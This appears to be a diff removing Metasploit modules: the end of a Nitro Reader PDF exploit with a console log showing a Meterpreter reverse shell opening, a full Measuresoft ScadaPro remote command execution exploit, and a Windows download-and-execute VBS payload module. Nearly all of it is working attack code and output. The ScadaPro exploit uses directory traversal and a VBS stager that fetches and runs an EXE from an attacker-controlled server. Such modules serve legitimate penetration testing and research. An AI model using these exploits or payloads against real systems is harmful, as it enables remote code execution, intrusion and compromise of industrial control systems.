this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
|
||||
)
|
||||
>>
|
||||
]
|
||||
>>
|
||||
>>
|
||||
>>
|
||||
endobj
|
||||
2 0 obj
|
||||
<</Type/Pages/Count 1/Kids [ 5 0 R ]>>
|
||||
endobj
|
||||
3 0 obj
|
||||
<<>>
|
||||
endobj
|
||||
xref
|
||||
0 6
|
||||
0000000000 65535 f
|
||||
0000000166 00000 n
|
||||
0000000244 00000 n
|
||||
0000000305 00000 n
|
||||
0000000009 00000 n
|
||||
0000000058 00000 n
|
||||
trailer <<
|
||||
/Size 6
|
||||
/Root 1 0 R
|
||||
>>
|
||||
startxref
|
||||
327
|
||||
%%EOF|
|
||||
pdf.gsub!(/ /,'')
|
||||
file_create(pdf)
|
||||
super
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
|
||||
[*] Processing scripts/nitro.rc for ERB directives.
|
||||
resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
|
||||
resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
resource (scripts/nitro.rc)> set LHOST 172.16.175.1
|
||||
LHOST => 172.16.175.1
|
||||
resource (scripts/nitro.rc)> exploit
|
||||
[*] Exploit running as background job.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.175.1:4444
|
||||
msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
|
||||
[*] Using URL: http://0.0.0.0:8080/
|
||||
[*] Local IP: http://192.168.100.4:8080/
|
||||
[*] Server started.
|
||||
[*] 192.168.100.4 nitro_reader_jsapi - Sending second stage payload
|
||||
[*] Sending stage (957487 bytes) to 172.16.175.232
|
||||
[*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
|
||||
[+] Deleted C:/Windows/Temp/UOIr.hta
|
||||
|
||||
msf exploit(nitro_reader_jsapi) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > shell
|
||||
Process 2412 created.
|
||||
Channel 2 created.
|
||||
Microsoft Windows [Version 6.1.7601]
|
||||
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
|
||||
|
||||
C:\Users\researcher\Desktop>
|
||||
=end
|
|
@ -1,126 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Measuresoft ScadaPro Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module allows remote attackers to execute arbitrary commands on the
|
||||
affected system by abusing via Directory Traversal attack when using the
|
||||
'xf' command (execute function). An attacker can execute system() from
|
||||
msvcrt.dll to upload a backdoor and gain remote code execution. This
|
||||
vulnerability affects version 4.0.0 and earlier.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Luigi Auriemma', # Initial discovery/poc
|
||||
'mr_me <steventhomasseeley[at]gmail.com>', # msf
|
||||
'TecR0c <tecr0c[at]tecninja.net>', # msf
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2011-3497'],
|
||||
[ 'OSVDB', '75490'],
|
||||
[ 'BID', '49613'],
|
||||
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
|
||||
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
|
||||
# seemed pretty accurate to us ;)
|
||||
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# truly universal
|
||||
[ 'Automatic', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Sep 16 2011'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(11234),
|
||||
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
|
||||
])
|
||||
end
|
||||
|
||||
# couldn't generate a vbs or exe payload and then use the wF command
|
||||
# as there is a limit to the amount of data to write to disk.
|
||||
# so we just write out a vbs script like the old days.
|
||||
|
||||
def build_vbs(url, stager_name)
|
||||
name_xmlhttp = rand_text_alpha(2)
|
||||
name_adodb = rand_text_alpha(2)
|
||||
|
||||
tmp = "#{@temp_folder}/#{stager_name}"
|
||||
|
||||
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
|
||||
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
|
||||
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
|
||||
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
|
||||
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
|
||||
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
|
||||
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
|
||||
|
||||
return vbs
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
if request.uri =~ /\.exe/
|
||||
print_status("Sending 2nd stage payload")
|
||||
return if ((p=regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe( {:code=>p.encoded} )
|
||||
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
# In order to save binary data to the file system the payload is written to a .vbs
|
||||
# file and execute it from there.
|
||||
@payload_name = rand_text_alpha(4)
|
||||
@temp_folder = "C:/Windows/Temp"
|
||||
|
||||
if datastore['SRVHOST'] == '0.0.0.0'
|
||||
lhost = Rex::Socket.source_address('50.50.50.50')
|
||||
else
|
||||
lhost = datastore['SRVHOST']
|
||||
end
|
||||
|
||||
payload_src = lhost
|
||||
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
|
||||
|
||||
stager_name = rand_text_alpha(6) + ".vbs"
|
||||
stager = build_vbs(payload_src, stager_name)
|
||||
|
||||
path = "..\\..\\..\\..\\..\\windows\\system32"
|
||||
|
||||
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
|
||||
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
|
||||
|
||||
print_status("Sending 1st stage payload...")
|
||||
|
||||
connect
|
||||
sock.get_once()
|
||||
sock.put(createvbs)
|
||||
sock.get_once()
|
||||
sock.put(download_execute)
|
||||
handler()
|
||||
disconnect
|
||||
|
||||
super
|
||||
end
|
||||
end
|
|
@ -1,72 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = :dynamic
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Windows Executable Download and Execute (via .vbs)',
|
||||
'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
|
||||
'Author' => 'scriptjunkie',
|
||||
'License' => BSD_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'Handler' => Msf::Handler::None,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'wscript',
|
||||
'Payload' =>
|
||||
{
|
||||
'Offsets' => { },
|
||||
'Payload' => ''
|
||||
}
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
|
||||
OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
|
||||
OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
|
||||
OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
|
||||
])
|
||||
end
|
||||
|
||||
def generate
|
||||
return super + command_string
|
||||
end
|
||||
|
||||
def command_string
|
||||
# It's already long. Keep variable names short.
|
||||
vbsname = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
exename = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
streamvar = Rex::Text.rand_text_alpha(1+rand(2))
|
||||
|
||||
command = ''
|
||||
command << "cmd.exe /q /c " if datastore['INCLUDECMD']
|
||||
# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
|
||||
# disappears quickly before the wscript libraries load and the file downloads
|
||||
command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
|
||||
"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
|
||||
"#{xmlhttpvar}.Send:"+
|
||||
"Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
|
||||
"#{streamvar}.Type=1:"+
|
||||
"#{streamvar}.Open:"+
|
||||
"#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
|
||||
"#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
|
||||
"CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
|
||||
command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
|
||||
command << " >#{vbsname}.vbs"+
|
||||
"&start wscript #{vbsname}.vbs"
|
||||
end
|
||||
end
|